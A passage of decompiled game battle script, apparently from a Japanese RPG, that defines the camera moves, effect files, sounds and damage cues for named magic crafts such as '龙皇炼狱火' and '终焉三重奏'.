PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
AS_03(0xFC, 0xB4)
Sleep(1900)
Yield()
LockCamera(0xF8, 0, 0, 0, 500)
AS_B0(0x23, 0x190)
Sleep(400)
Yield()
AS_3D(200, 100, 200, 2700)
Sleep(2400)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x1, 0x7)
Sleep(350)
Yield()
SetCameraDistance(15000, 700)
AS_B0(0x1C, 0x258)
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 2)
Sleep(700)
Yield()
AS_3D(500, 500, 500, 3500)
SetCameraDegree(0, 15, -5, 500)
AS_B0(0x19, 0x5DC)
SetCameraDistance(35000, 4200)
Sleep(2000)
Yield()
SetCameraDegree(-30, 25, -5, 2800)
LockCamera(0xFE, 0, 2000, 0, 2800)
SetBattleSpeed(700)
Sleep(2800)
Yield()
SetBattleSpeed(1000)
Fade(0x1, 500, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFE, 0, 0, 0, 0)
StopEffect(0xFF, 0x2)
AS_0A(0xFC, 0x1, 0x0, 0x0)
ResetBrightness(0)
AS_5F(0xF7, 0x1)
CancelBlur(500)
Sleep(300)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
SetBrightness(0x0, 0x1, 0)
AS_8F(0x0)
Return()
# 赤红射线 end
def Craft_龙皇炼狱火(): pass
label("龙皇炼狱火")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg035_00.eff")
LoadEffect(0x1, "battle\\mg035_01.eff")
LoadEffect(0x2, "battle\\mg035_02.eff")
LoadEffect(0x3, "battle\\mg035_03.eff")
LoadEffect(0x4, "battle\\mg035_04.eff")
LoadEffect(0x5, "battle\\mg035_05.eff")
LoadEffect(0x6, "battle\\mg035_06.eff")
LoadEffect(0x7, "battle\\mg015_03.eff")
AS_78(0)
Call("loc_17D")
AS_34()
LockCamera(0xFD, 100, 500, -11200, 0)
SetCameraDegree(0, 10, 0, 0)
SetCameraDistance(22000, 0)
AS_AC(0x3E8, 0x927C0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
SoundEx(197, 0x0)
Sleep(1100)
Yield()
PlayEffect(0xFF, 0xFD, 0x4, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 3)
Sleep(300)
Yield()
Fade(0x1, 500, 0x0)
SetBattleSpeed(600)
SoundEx(320, 0x0)
LockCamera(0xFD, 0, 1300, -10900, 0)
AS_0B(0xDC, 0x0)
SetCameraDistance(6500, 0)
AS_0B(0x190, 0x3E8)
SetCameraDistance(3000, 1000)
AS_B0(0x28, 0x708)
Sleep(500)
Yield()
AS_B0(0x28, 0x1F4)
LockCamera(0xFD, -1300, 4400, -11100, 700)
SoundEx(339, 0x0)
Sleep(500)
Yield()
BlurSwitch(0xC8, 0xBBFFFFFF, 0x1, 0x0, 0x0)
SetCameraDistance(6000, 500)
SoundEx(261, 0x0)
Sleep(1500)
Yield()
SoundEx(320, 0x0)
CancelBlur(1000)
SetBattleSpeed(1000)
AS_B0(0x46, 0x3E8)
Sleep(1500)
Yield()
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x14B4)
PlayEffect(0xFF, 0xFD, 0x4, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 3)
AS_1A(0xFF, 0x3, 0x1388)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 6000, -10000, 0, 0, 0, 900, 900, 900, 4)
AS_1A(0xFF, 0x4, 0x2710)
LockCamera(0xFD, 800, 4000, -10000, 0)
AS_B0(0x54, 0x0)
AS_3C(0xFFD8, 0x0)
AS_0B(0x0, 0x0)
SetCameraDistance(16000, 0)
LockCamera(0xFD, -1000, 36000, -4000, 1800)
SetCameraDistance(17000, 1800)
SoundEx(251, 0x0)
Sleep(300)
Yield()
BlurSwitch(0x32, 0xBBFFFFFF, 0x1, 0x0, 0x0)
Sleep(700)
Yield()
CancelBlur(1000)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
StopEffect(0xFF, 0x4)
Fade(0x1, 200, 0x0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x1FA4)
LockCamera(0xFD, 0, 35000, -10000, 0)
AS_0B(0xFFB0, 0x0)
AS_B0(0x19, 0x0)
AS_3C(0xA, 0x0)
SetCameraDistance(10000, 0)
SetCameraDistance(13000, 500)
LockCamera(0xFD, 0, 43500, -10000, 2000)
AS_0B(0xFFC4, 0x7D0)
AS_B0(0xFFF6, 0x7D0)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 6000, -10000, 0, 0, 0, 900, 900, 900, 3)
SoundEx(375, 0x0)
Sleep(1500)
Yield()
SoundEx(204, 0x0)
Sleep(250)
Yield()
SoundEx(253, 0x0)
Sleep(550)
Yield()
CancelEffect(0xFF, 0x3)
Sleep(1000)
Yield()
Fade(0x1, 600, 0x0)
LockCamera(0xFD, 0, 43800, -11400, 0)
AS_B0(0x1, 0x0)
AS_3C(0x0, 0x0)
AS_0B(0xFFFF, 0x0)
SetCameraDistance(600, 0)
PlayEffect(0xFF, 0xFD, 0x6, 0x0, 0, 42500, -11000, 0, 0, 0, 1200, 1200, 1200, 4)
PlayEffect(0xFF, 0xFD, 0x7, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(320, 0x0)
SetCameraDistance(3000, 3500)
SoundEx(371, 0x0)
Sleep(2500)
Yield()
PlayEffect(0xFF, 0xFD, 0x2, 0x0, 0, 43300, -11000, 15, 180, 0, 150, 150, 150, -1)
AS_0B(0xFFF6, 0x76C)
Sleep(1900)
Yield()
LockCamera(0xFD, 0, 43000, -12000, 500)
AS_0B(0xFFEC, 0x5DC)
AS_B0(0xA, 0x5DC)
SetCameraDistance(10000, 800)
Sleep(800)
Yield()
AS_A8(0x0, 0x7)
CancelEffect(0xFF, 0x4)
AS_A8(0x0, 0x2)
Fade(0x1, 500, 0x0)
LockCamera(0xFD, 10000, 1000, 8000, 0)
AS_0B(0x91, 0x0)
AS_B0(0x14, 0x0)
AS_3C(0x0, 0x0)
SetCameraDistance(30000, 0)
LockCamera(0xFD, 6000, 1000, 8000, 2000)
AS_0B(0x73, 0x7D0)
SetCameraDistance(19000, 3000)
AS_5F(0xFC, 0x0)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFD, 0x5, 0x0, 8000, 0, 8000, 0, 90, 0, 1000, 1000, 1000, 2)
Sleep(2700)
Yield()
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 8000, 0, 8000, 0, 90, 0, 1200, 1200, 1200, -1)
AS_0B(0x64, 0x7D0)
SetCameraDistance(25000, 3000)
SoundEx(367, 0x0)
Sleep(2300)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(500)
Yield()
AS_43(0x0, 0x1F4, 0xFFFFFFFF)
Sleep(1500)
Yield()
EndChrThread(0xFF, 3)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
Call("loc_1D5")
Call("loc_1A3")
Call("loc_1CA")
Return()
# 龙皇炼狱火 end
def Craft_24_36_2131(): pass
label("Craft_24_36_2131")
Return()
# Craft_24_36_2131 end
def Craft_25_37_2132(): pass
label("Craft_25_37_2132")
Jump("Craft_11_17_D69")
# Craft_25_37_2132 end
def Craft_胜利之符文(): pass
label("胜利之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg038_00.eff")
LoadEffect(0x3B, "battle\\mg038_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg038_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 胜利之符文 end
def Craft_雷电击(): pass
label("雷电击")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg040_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 3500, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
LockCamera(0xFE, 0, 1000, 0, 200)
AS_3D(200, 200, 200, 200)
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 雷电击 end
def Craft_风之镰(): pass
label("风之镰")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg041_00.eff")
LoadEffect(0x1, "battle\\mg041_01.eff")
AS_78(0)
Sleep(250)
Yield()
PlayEffect(0xFF, 0xF9, 0x0, 0x5, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 20, 30)
Sleep(400)
Yield()
ResetTarget()
AS_83(0x0)
label("loc_2276")
ForeachTarget("loc_22A5")
PlayEffect(0xFF, 0xF8, 0x1, 0x10, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(100)
Yield()
NextTarget()
Jump("loc_2276")
label("loc_22A5")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 风之镰 end
def Craft_风之领域(): pass
label("风之领域")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg042_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFB, 0, 0, 0, 600)
SetCameraDistance(18700, 1000)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(800)
Yield()
AS_3D(100, 100, 100, 3200)
Sleep(300)
Yield()
BlurSwitch(0x190, 0xBBFFFFFF, 0x1, 0x0, 0x0)
Sleep(400)
Yield()
AS_B0(0x15, 0x7D0)
LockCamera(0xFB, 0, 1800, 0, 2400)
SetCameraDistance(22000, 2400)
Sleep(3200)
Yield()
Fade(0x1, 500, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Sleep(800)
Yield()
CancelBlur(500)
Call("loc_2")
AS_14(0x0)
FreeEffect(0x0)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Return()
# 风之领域 end
def Craft_闪电之力(): pass
label("闪电之力")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg043_00.eff")
LoadEffect(0x1, "battle\\mg043_01.eff")
AS_78(0)
LockCamera(0xF4, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(1700)
Yield()
ResetTarget()
label("loc_23F7")
ForeachTarget("loc_2426")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(50)
Yield()
NextTarget()
Jump("loc_23F7")
label("loc_2426")
WaitEffect(0xFF, 0x4)
AS_14(0x1)
Call("loc_1D5")
Return()
# 闪电之力 end
def Craft_雷光龙卷(): pass
label("雷光龙卷")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg044_00.eff")
LoadEffect(0x1, "battle\\mg043_01.eff")
AS_78(0)
SetBrightness(0x0, 0x0, 800)
Sleep(200)
Yield()
SetCameraDistance(26000, 600)
LockCamera(0xFB, 0, 0, 0, 600)
Sleep(600)
Yield()
AS_60(0xF7)
AS_5F(0xFC, 0x0)
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(1000)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x4)
AS_B0(0x14, 0xBB8)
Sleep(3200)
Yield()
SetCameraDistance(30000, 300)
AS_B0(0x1E, 0x12C)
Sleep(300)
Yield()
CancelBlur(500)
Fade(0x1, 300, 0x0)
AS_5F(0xF7, 0x1)
Sleep(200)
Yield()
ResetTarget()
label("loc_24E3")
ForeachTarget("loc_250C")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_24E3")
label("loc_250C")
ResetBrightness(500)
BeginChrThread(0xFF, 3, "loc_2", 0x0)
WaitEffect(0xFF, 0x4)
Call("loc_1D5")
Sleep(600)
Yield()
SetBrightness(0x0, 0x1, 0)
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Return()
# 雷光龙卷 end
def Craft_终焉三重奏(): pass
label("终焉三重奏")
ResetTarget()
AS_78(1)
LoadEffect(0x1, "battle\\mg045_01.eff")
LoadEffect(0x2, "battle\\mg045_02.eff")
LoadEffect(0x3, "battle\\mg045_03.eff")
LoadEffect(0x4, "battle\\mg045_04.eff")
LoadEffect(0x5, "battle\\mg045_05.eff")
LoadEffect(0x6, "battle\\mg045_06.eff")
AS_78(0)
Call("loc_17D")
ClearChipModeFlags(0x0, 0xFC, 0x1)
AS_34()
Fade(0x1, 1000, 0x0)
AS_AC(0x3E8, 0xFFFFFFFF)
LockCamera(0xFD, 0, 14400, -12000, 0)
SetCameraDegree(0, -10, 0, 0)
SetCameraDistance(32000, 0)
SetCameraDistance(27500, 2000)
SoundEx(132, 0x1)
PlayEffect(0xFF, 0xFD, 0x4, 0x0, 0, 10000, -10000, 0, 0, 0, 1000, 1000, 1000, 3)
PlayEffect(0xFF, 0xFD, 0x6, 0x0, 0, 12000, -10000, 0, 0, 0, 600, 600, 600, 6)
SoundEx(359, 0x1)
Sleep(2400)
Yield()
CancelEffect(0xFF, 0x6)
Sleep(100)
Yield()
PlayEffect(0xFF, 0xFD, 0x5, 0x0, 0, 13000, -10000, 0, 0, 0, 1000, 1000, 1000, 5)
SoundEx(200, 0x0)
Sleep(300)
Yield()
CancelEffect(0xFF, 0x4)
SetBattleSpeed(600)
StopSound(359)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 13000, -10000, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(500)
Yield()
CancelEffect(0xFF, 0x5)
CancelEffect(0xFF, 0x2)
SoundEx(359, 0x1)
LockCamera(0xFD, 0, 11000, -11700, 0)
SetCameraDistance(3850, 0)
AS_B0(0xFFEC, 0x0)
Fade(0x1, 500, 0x0)
CancelEffect(0xFF, 0x3)
LockCamera(0xFD, 0, 20200, -11700, 2000)
AS_B0(0xA, 0x7D0)
Sleep(1800)
Yield()
StopSound(359)
Fade(0x1, 500, 0x0)
LockCamera(0xFD, 0, 14300, -11100, 0)
SetCameraDistance(32000, 0)
AS_B0(0xFFF6, 0x0)
Sleep(300)
Yield()
CancelEffect(0xFF, 0x5)
SetBattleSpeed(1000)
PlayEffect(0xFF, 0xFD, 0x5, 0x0, 0, 13000, -10000, 0, 0, 0, 800, 800, 800, 5)
AS_1A(0xFF, 0x5, 0x7D0)
StopSound(132)
Sleep(1150)
Yield()
Fade(0x1, 500, 0x0)
LockCamera(0xFD, 8000, 500, 8000, 0)
AS_0B(0x1E, 0x0)
AS_B0(0xA, 0x0)
AS_3C(0x5, 0x0)
SetCameraDistance(27000, 0)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
StopEffect(0xFF, 0x4)
ChrSetPos(0xFF, 0xF3, 0, 0, 0)
AS_8D(0x1, 0x0, 0x0, 0x0, 0x0)
ResetTarget()
label("loc_27B2")
ForeachTarget("loc_27D8")
AS_05(0xFE, 0x2, 0x0)
def lambda_27C0():
AS_21(0x1, 0xFF, -2500, 0)
Return()
QueueWorkItem(0xFE, 1, lambda_27C0)
TurnDirection(0xFE, 0xFF, 0, 0, 0x0)
NextTarget()
Jump("loc_27B2")
label("loc_27D8")
WaitChrThread(0xFC, 1)
AS_5F(0xFC, 0x0)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFD, 0x5, 0x0, 8000, 0, 8000, 0, 0, 0, 1000, 1000, 1000, 5)
AS_1A(0xFF, 0x5, 0xFA0)
AS_0B(0x2D, 0x320)
AS_B0(0x1E, 0x320)
SetCameraDistance(32000, 800)
PlayEffect(0xFF, 0xFD, 0x4, 0x0, 0, 10000, -10000, 0, 0, 0, 1000, 1000, 1000, 3)
AS_1A(0xFF, 0x3, 0x2710)
Sleep(300)
Yield()
ResetTarget()
label("loc_283E")
ForeachTarget("loc_2849")
DamageAnime(0xFE, 0x0, 0x32)
NextTarget()
Jump("loc_283E")
label("loc_2849")
Sleep(850)
Yield()
Fade(0x1, 1000, 0x0)
AS_5F(0xFC, 0x0)
LockCamera(0xFD, 8000, 35900, 8000, 0)
SetCameraDistance(12800, 0)
AS_0B(0xF, 0x0)
AS_B0(0xFFE7, 0x0)
AS_3C(0xFFF6, 0x0)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 8000, 36500, 8000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x1770)
SoundEx(238, 0x0)
Sleep(400)
Yield()
SoundEx(339, 0x0)
Sleep(600)
Yield()
SoundEx(375, 0x0)
Sleep(1000)
Yield()
LockCamera(0xFD, 8000, 36500, 8000, 300)
SetCameraDistance(28000, 300)
Sleep(200)
Yield()
BlurSwitch(0x258, 0xBBFFFFFF, 0x1, 0x1, 0xA)
SetBattleSpeed(400)
Sleep(300)
Yield()
SetBattleSpeed(1000)
Sleep(1200)
Yield()
LockCamera(0xFD, 8000, 1000, 8000, 500)
AS_B0(0x5, 0x1F4)
Sleep(500)
Yield()
CancelBlur(500)
PlayEffect(0xFF, 0xFD, 0x2, 0x0, 8000, 0, 8000, 0, 0, 0, 750, 750, 750, 3)
SoundEx(210, 0x0)
SetCameraDistance(26000, 300)
AS_0B(0x0, 0x9C4)
AS_B0(0xF, 0x9C4)
Sleep(1200)
Yield()
SetCameraDistance(33000, 2500)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 8000, 0, 8000, 0, 0, 0, 800, 800, 800, 4)
BlurSwitch(0x1F4, 0xBBFFFFFF, 0x0, 0x1, 0x7)
AS_A6(0xFF, 0x4, 0x4B0, 0x3E8, 0x0)
SoundEx(359, 0x1)
Sleep(1000)
Yield()
AS_43(0x0, 0x1F4, 0xFFFFFFFF)
CancelBlur(1000)
Sleep(1000)
Yield()
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
AS_A8(0x0, 0x4)
AS_A8(0x0, 0x5)
AS_A8(0x0, 0x6)
StopSound(359)
Sleep(500)
Yield()
AS_8D(0xA, 0x0, 0x0, 0x0, 0x0)
Call("loc_1D5")
Call("loc_1A3")
EndChrThread(0xFC, 1)
Call("loc_1CA")
Return()
# 终焉三重奏 end
def Craft_2E_46_29DE(): pass
label("Craft_2E_46_29DE")
Return()
# Craft_2E_46_29DE end
def Craft_2F_47_29DF(): pass
label("Craft_2F_47_29DF")
Jump("Craft_11_17_D69")
# Craft_2F_47_29DF end
def Craft_暴风之符文(): pass
label("暴风之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg048_00.eff")
LoadEffect(0x3B, "battle\\mg048_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg048_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 暴风之符文 end
def Craft_心灵之霞(): pass
label("心灵之霞")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg050_00.eff")
LoadEffect(0x1, "battle\\mg050_01.eff")
AS_78(0)
Sleep(250)
Yield()
PlayEffect(0xFF, 0xF9, 0x0, 0x4, 0, 0, 500, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1500)
Yield()
LockCamera(0xFE, 0, 0, 0, 300)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 心灵之霞 end
def Craft_死亡螺旋(): pass
label("死亡螺旋")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg051_00.eff")
LoadEffect(0x1, "battle\\mg051_01.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
SetCameraDistance(22000, 600)
Sleep(450)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1300)
Yield()
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2000)
Yield()
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 死亡螺旋 end
def Craft_暗影裁决(): pass
label("暗影裁决")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg052_00.eff")
LoadEffect(0x1, "battle\\mg052_01.eff")
LoadEffect(0x2, "battle\\mg052_02.eff")
AS_78(0)
Sleep(200)
Yield()
SetBrightness(0x0, 0x0, 500)
AS_43(0x0, 0x1F4, 0x0)
Sleep(800)
Yield()
Fade(0x1, 500, 0x0)
AS_60(0xF7)
LockCamera(0xFD, -1500, -25000, -4000, 0)
SetCameraDegree(0, 320, -22, 0)
SetCameraDistance(50000, 0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 2)
AS_3D(50, 50, 50, 1800)
LockCamera(0xFD, 1100, 5000, 0, 1600)
Sleep(200)
Yield()
SetCameraDistance(13000, 1300)
SetCameraDegree(20, 300, -22, 1200)
Sleep(1200)
Yield()
BlurSwitch(0xC8, 0xBBFFFFFF, 0x0, 0x1, 0x7)
LockCamera(0xFD, 1800, 15000, 4000, 400)
AS_43(0x0, 0x12C, 0x0)
SetCameraDistance(5000, 300)
Sleep(300)
Yield()
StopEffect(0xFF, 0x2)
CancelBlur(0)
Fade(0x1, 300, 0x0)
ResetBrightness(500)
AS_5F(0xF7, 0x1)
AS_31(0x17, 0x0)
LockCamera(0xF4, 0, 3000, 0, 0)
SetCameraDistance(25000, 0)
AS_B0(0x21, 0x0)
Sleep(500)
Yield()
PlayEffect(0xFE, 0xF2, 0x0, 0x0, 0, 200, 0, 0, 0, 0, 1000, 1000, 1000, 3)
AS_1A(0xFE, 0x3, 0xBB8)
LockCamera(0xF4, 0, 0, 0, 400)
Sleep(1200)
Yield()
ResetTarget()
label("loc_2CC8")
ForeachTarget("loc_2CF1")
PlayEffect(0xFF, 0xFF, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(100)
Yield()
NextTarget()
Jump("loc_2CC8")
label("loc_2CF1")
Sleep(1600)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTargetAdd(0xFF, "", 0x0)
LookingTarget(300, 28, 20)
AS_B0(0x16, 0x320)
PlayEffect(0xFF, 0xF9, 0x2, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(300)
Yield()
BeginChrThread(0xFF, 3, "loc_2", 0x0)
Sleep(2500)
Yield()
SetBrightness(0x0, 0x1, 0)
WaitEffect(0xFF, 0x4)
AS_14(0x1)
AS_14(0x2)
Call("loc_1D5")
Return()
# 暗影裁决 end
def Craft_灾厄镰刃(): pass
label("灾厄镰刃")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg053_00.eff")
LoadEffect(0x1, "battle\\mg050_01.eff")
AS_78(0)
SoundEx(222, 0x0)
Sleep(250)
Yield()
PlayEffect(0xFF, 0xFF, 0x0, 0x4, 0, 0, 500, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1100)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 20, 30)
Sleep(400)
Yield()
ResetTarget()
AS_83(0x0)
label("loc_2DB0")
ForeachTarget("loc_2DDF")
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(100)
Yield()
NextTarget()
Jump("loc_2DB0")
label("loc_2DDF")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
Return()
# 灾厄镰刃 end
def Craft_堕天使暗翼(): pass
label("堕天使暗翼")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg054_00.eff")
LoadEffect(0x1, "battle\\mg054_01.eff")
LoadEffect(0x2, "battle\\mg054_02.eff")
LoadEffect(0x3, "battle\\mg054_03.eff")
AS_78(0)
Call("loc_17D")
AS_60(0xFC)
AS_8D(0xB, 0x0, 0x0, 0x0, 0x0)
ChrSetPos(0xFF, 0xF3, 0, 0, -2500)
AS_AC(0x1F4, 0xFFFFFFFF)
LockCamera(0xF3, 0, 100, -9500, 0)
SetCameraDegree(320, 30, -8, 0)
SetCameraDistance(15000, 0)
SetCameraDegree(180, 26, 0, 4500)
SetCameraDistance(8300, 4500)
PlayEffect(0xFF, 0xF3, 0x0, 0x0, 0, 0, -9500, 0, 0, 0, 1000, 1000, 1000, 2)
PlayEffect(0xFF, 0xF3, 0x3, 0x0, 0, 0, -9500, 0, 0, 0, 1000, 1000, 1000, 3)
SoundEx(215, 0x0)
AS_52(0x1)
label("loc_2EF6")
ForeachTarget("loc_2F0B")
Jc(0x4, 0x2, 0x100, "loc_2F07")
AS_53(0x1)
Jump("loc_2F0B")
label("loc_2F07")
NextTarget()
Jump("loc_2EF6")
label("loc_2F0B")
ResetTarget()
ResetTarget()
AS_83(0x0)
Jc(0x5, 0x1, 0x1, "loc_2F2D")
AS_8D(0x7, 0xFC, 0x1F4, 0x1F4, 0x1F4)
Jump("loc_2F3F")
label("loc_2F2D")
AS_8D(0x7, 0xFC, 0x12C, 0x12C, 0x12C)
label("loc_2F3F")
Sleep(4100)
Yield()
AS_5F(0xFC, 0x0)
SetCameraDegree(180, -2, 0, 1500)
Sleep(400)
Yield()
PlayEffect(0xFF, 0xF3, 0x2, 0x0, 0, 0, -9500, 0, 0, 0, 1000, 1000, 1000, 4)
SetCameraDistance(20000, 1000)
Sleep(500)
Yield()
LockCamera(0xF3, 0, 1600, -8500, 2000)
SetCameraDegree(180, 0, 0, 2000)
SetCameraDistance(38000, 2000)
Sleep(1000)
Yield()
StopEffect(0xFF, 0x2)
CancelEffect(0xFF, 0x3)
PlayEffect(0xFF, 0xF3, 0x1, 0x0, 0, 0, -9500, 0, 0, 0, 1000, 1000, 1000, 3)
SetCameraDistance(40000, 3500)
SetCameraDegree(205, -10, 0, 3500)
AS_A6(0xFF, 0x3, 0x4B0, 0x3E8, 0x0)
Sleep(3200)
Yield()
SoundEx(173, 0x0)
AS_43(0x0, 0x1F4, 0xFFFFFFFF)
Sleep(1000)
Yield()
EndChrThread(0xFC, 1)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
Call("loc_1D5")
AS_6E(0x40000)
Fade(0x1, 500, 0x0)
AS_7A(0x1)
ShowChr(0xFF, 0)
AS_5F(0xF7, 0x0)
ResetBrightness(0)
SetBrightness(0x0, 0x1, 0)
AS_31(0x17, 0x0)
AS_31(0x3, 0x0)
Call("loc_2")
AS_8F(0x0)
AS_31(0x17, 0x3E8)
Return()
# 堕天使暗翼 end
def Craft_37_55_3063(): pass
label("Craft_37_55_3063")
Return()
# Craft_37_55_3063 end
def Craft_38_56_3064(): pass
label("Craft_38_56_3064")
Return()
# Craft_38_56_3064 end
def Craft_39_57_3065(): pass
label("Craft_39_57_3065")
Jump("Craft_11_17_D69")
# Craft_39_57_3065 end
def Craft_刹那之符文(): pass
label("刹那之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg058_00.eff")
LoadEffect(0x3B, "battle\\mg058_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg058_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 刹那之符文 end
def Craft_暗物质(): pass
label("暗物质")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg060_00.eff")
AS_78(0)
Sleep(400)
Yield()
LockCamera(0xFB, 0, 1000, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 2)
AS_3D(100, 100, 100, 1400)
Sleep(1000)
Yield()
AS_8D(0x9, 0x3, 0x7D0, 0x0, 0x0)
AS_8D(0x7, 0xFC, 0x3E8, 0x384, 0x3E8)
Sleep(300)
Yield()
